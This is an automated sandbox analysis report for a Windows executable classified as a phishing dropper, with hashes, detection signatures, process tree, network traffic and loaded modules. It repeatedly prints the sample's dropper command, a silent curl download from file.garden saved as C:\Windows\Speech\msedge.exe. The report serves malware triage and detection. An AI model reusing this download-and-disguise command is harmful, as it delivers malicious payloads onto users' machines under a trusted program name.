Edit tour

Windows Analysis Report
4sTTCruY06.exe

Overview

General Information

Sample name:	4sTTCruY06.exe renamed because original name is a hash value
Original sample name:	38c2636423b5916077207678dd1adbc782d863342e75fdcaabad162d8f8e2824.exe
Analysis ID:	1522833
MD5:	5a4bbfbb9e1269cbc36a6371d77acbfc
SHA1:	807a3b64b0ce44a80e3c7e347b5a02372e28892e
SHA256:	38c2636423b5916077207678dd1adbc782d863342e75fdcaabad162d8f8e2824
Tags:	exezelensky-topuser-JAMESWT_MHT
Infos:

Detection

HTMLPhisher

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected BlockedWebSite

AI detected suspicious sample

Creates HTML files with .exe extension (expired dropper behavior)

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Usage Of Web Request Commands And Cmdlets

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

4sTTCruY06.exe (PID: 3348 cmdline: "C:\Users\user\Desktop\4sTTCruY06.exe" MD5: 5A4BBFBB9E1269CBC36A6371D77ACBFC)

conhost.exe (PID: 3576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3812 cmdline: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\msedge.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

curl.exe (PID: 4524 cmdline: curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\msedge.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Windows\Speech\msedge.exe	JoeSecurity_BlockedWebSite	Yara detected BlockedWebSite	Joe Security

Sigma Signatures

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\msedge.exe, CommandLine: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\msedge.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\4sTTCruY06.exe", ParentImage: C:\Users\user\Desktop\4sTTCruY06.exe, ParentProcessId: 3348, ParentProcessName: 4sTTCruY06.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\msedge.exe, ProcessId: 3812, ProcessName: cmd.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 4sTTCruY06.exe

ReversingLabs: Detection: 21%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.4% probability

Phishing

Yara detected BlockedWebSite

Source: Yara match

File source: C:\Windows\Speech\msedge.exe, type: DROPPED

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2

Source: 4sTTCruY06.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

Creates HTML files with .exe extension (expired dropper behavior)

Source: C:\Windows\System32\curl.exe

File created: msedge.exe.3.dr

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View

JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /ZloBYxFY2AfQRNoi/dx3d9.bin HTTP/1.1Host: file.gardenUser-Agent: curl/7.83.1Accept: */*

Source: global traffic

DNS traffic detected: DNS query: file.garden

Source: Amcache.hve.0.dr	String found in binary or memory: http://upx.sf.net
Source: curl.exe, 00000003.00000002.2090175602.0000022B46EA0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000002.2090175602.0000022B46EA8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2090061719.0000022B46EB6000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2089991956.0000022B46EB3000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000002.2090225439.0000022B46EDA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2090042256.0000022B46EDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin
Source: curl.exe, 00000003.00000002.2090175602.0000022B46EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin--outputC:
Source: curl.exe, 00000003.00000002.2090175602.0000022B46EA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.binlrc
Source: curl.exe, 00000003.00000003.2089781752.0000022B46F05000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2089724979.0000022B46F1E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2089833939.0000022B46F1E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2089781752.0000022B46F1E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2089881481.0000022B46EC0000.00000004.00000020.00020000.00000000.sdmp, msedge.exe.3.dr	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: curl.exe, 00000003.00000003.2089724979.0000022B46F1E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2089833939.0000022B46F1E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2089781752.0000022B46F1E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2089881481.0000022B46EC0000.00000004.00000020.00020000.00000000.sdmp, msedge.exe.3.dr	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2

Source: C:\Users\user\Desktop\4sTTCruY06.exe

Code function: 0_2_00007FF69DCF96E0 free,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,

0_2_00007FF69DCF96E0

Source: C:\Users\user\Desktop\4sTTCruY06.exe

Code function: 0_2_00007FF69DCF9840 OpenClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,CloseClipboard,

0_2_00007FF69DCF9840

Source: C:\Users\user\Desktop\4sTTCruY06.exe

Code function: 0_2_00007FF69DCF96E0 free,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,

0_2_00007FF69DCF96E0

Source: C:\Users\user\Desktop\4sTTCruY06.exe

Code function: 0_2_00007FF69DCDEAF4 TranslateMessage,DispatchMessageW,PeekMessageW,GetCursorPos,GetAsyncKeyState,

0_2_00007FF69DCDEAF4

Source: C:\Users\user\Desktop\4sTTCruY06.exe

Code function: 0_2_00007FF69DCE1090 GetClientRect,QueryPerformanceCounter,GetForegroundWindow,ClientToScreen,SetCursorPos,GetCursorPos,ScreenToClient,GetKeyState,GetKeyState,GetKeyState,GetKeyState,

0_2_00007FF69DCE1090

Source: C:\Windows\System32\curl.exe

File created: C:\Windows\Speech\msedge.exe

Jump to behavior

Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCD1230	0_2_00007FF69DCD1230
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCEC326	0_2_00007FF69DCEC326
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCE5320	0_2_00007FF69DCE5320
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DD0CAA0	0_2_00007FF69DD0CAA0
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCF5A80	0_2_00007FF69DCF5A80
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DD01680	0_2_00007FF69DD01680
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCFCEA0	0_2_00007FF69DCFCEA0
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DD0E260	0_2_00007FF69DD0E260
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DD0F260	0_2_00007FF69DD0F260
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCFF640	0_2_00007FF69DCFF640
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCDF640	0_2_00007FF69DCDF640
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DD10650	0_2_00007FF69DD10650
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCE6E12	0_2_00007FF69DCE6E12
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCD8E10	0_2_00007FF69DCD8E10
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCE0A0C	0_2_00007FF69DCE0A0C
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCE0A30	0_2_00007FF69DCE0A30
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCE95D0	0_2_00007FF69DCE95D0
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCF11F0	0_2_00007FF69DCF11F0
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCE6990	0_2_00007FF69DCE6990
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCDB15E	0_2_00007FF69DCDB15E
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCE5D10	0_2_00007FF69DCE5D10
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCF7530	0_2_00007FF69DCF7530
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DD01130	0_2_00007FF69DD01130
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCE74C0	0_2_00007FF69DCE74C0
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCF6CE0	0_2_00007FF69DCF6CE0
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCEFC90	0_2_00007FF69DCEFC90
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DD00890	0_2_00007FF69DD00890
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCE1090	0_2_00007FF69DCE1090
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCFFC80	0_2_00007FF69DCFFC80
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DD0BCB0	0_2_00007FF69DD0BCB0
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCE00B0	0_2_00007FF69DCE00B0
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCFB8A0	0_2_00007FF69DCFB8A0
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCD7050	0_2_00007FF69DCD7050
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCDF450	0_2_00007FF69DCDF450
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DD17C70	0_2_00007FF69DD17C70
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DD17040	0_2_00007FF69DD17040
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCE5C60	0_2_00007FF69DCE5C60
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DD0DC50	0_2_00007FF69DD0DC50
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DD07000	0_2_00007FF69DD07000
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCD402D	0_2_00007FF69DCD402D
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCD4029	0_2_00007FF69DCD4029
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCD4025	0_2_00007FF69DCD4025
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCF5020	0_2_00007FF69DCF5020
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DD02C20	0_2_00007FF69DD02C20
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCD4021	0_2_00007FF69DCD4021
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCD9820	0_2_00007FF69DCD9820
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCD401D	0_2_00007FF69DCD401D
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCD4019	0_2_00007FF69DCD4019
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCD5BD0	0_2_00007FF69DCD5BD0
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCE77F5	0_2_00007FF69DCE77F5
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCF3BE0	0_2_00007FF69DCF3BE0
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCEA7E0	0_2_00007FF69DCEA7E0
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DD013E0	0_2_00007FF69DD013E0
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCD5FE0	0_2_00007FF69DCD5FE0
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCFDF80	0_2_00007FF69DCFDF80
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DD093B0	0_2_00007FF69DD093B0
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DD00340	0_2_00007FF69DD00340
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCD3B70	0_2_00007FF69DCD3B70

Source: C:\Users\user\Desktop\4sTTCruY06.exe

Code function: String function: 00007FF69DCF99F0 appears 34 times

Source: classification engine

Classification label: mal64.phis.winEXE@7/3@1/2

Source: C:\Users\user\Desktop\4sTTCruY06.exe

Code function: 0_2_00007FF69DCD1230 CreateThread,GetSystemMetrics,GetSystemMetrics,CreateFileA,CreateToolhelp32Snapshot,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@I@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,GetModuleHandleA,GetCurrentProcessId,FreeLibrary,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_J@Z,_beginthreadex,_Thrd_detach,_beginthreadex,_Thrd_detach,_beginthreadex,_Thrd_detach,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,

0_2_00007FF69DCD1230

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3576:120:WilError_03

Source: 4sTTCruY06.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\4sTTCruY06.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\4sTTCruY06.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 4sTTCruY06.exe

ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Users\user\Desktop\4sTTCruY06.exe "C:\Users\user\Desktop\4sTTCruY06.exe"
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\msedge.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\msedge.exe
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\msedge.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\msedge.exe	Jump to behavior

Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: d3dcompiler_47.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Users\user\Desktop\4sTTCruY06.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: 4sTTCruY06.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: 4sTTCruY06.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 4sTTCruY06.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 4sTTCruY06.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 4sTTCruY06.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 4sTTCruY06.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 4sTTCruY06.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 4sTTCruY06.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: 4sTTCruY06.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: 4sTTCruY06.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 4sTTCruY06.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 4sTTCruY06.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 4sTTCruY06.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 4sTTCruY06.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\4sTTCruY06.exe

Code function: 0_2_00007FF69DCE0710 QueryPerformanceFrequency,QueryPerformanceCounter,malloc,LoadLibraryA,GetProcAddress,GetProcAddress,

0_2_00007FF69DCE0710

Source: 4sTTCruY06.exe

Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCDA2D3 push rsp; retf	0_2_00007FF69DCDA2D4
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCDA264 push rsp; retf	0_2_00007FF69DCDA26A
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DD14D83 push rbp; retf	0_2_00007FF69DD14D88
Source: C:\Users\user\Desktop\4sTTCruY06.exe	Code function: 0_2_00007FF69DCDAF86 push rdx; retf 0004h	0_2_00007FF69DCDAF87

Source: C:\Users\user\Desktop\4sTTCruY06.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Source: C:\Users\user\Desktop\4sTTCruY06.exe

0_2_00007FF69DCD1230

Source: C:\Users\user\Desktop\4sTTCruY06.exe

API coverage: 2.1 %

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: Amcache.hve.0.dr	Binary or memory string: VMware
Source: Amcache.hve.0.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.0.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.0.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.0.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.0.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.0.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.0.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.0.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: curl.exe, 00000003.00000003.2089991956.0000022B46EB3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
Source: Amcache.hve.0.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.0.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.0.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.0.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.0.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: 4sTTCruY06.exe, 00000000.00000002.3336102479.000002594CF1C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.0.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.0.dr	Binary or memory string: \driver\vmci,\driver\pci
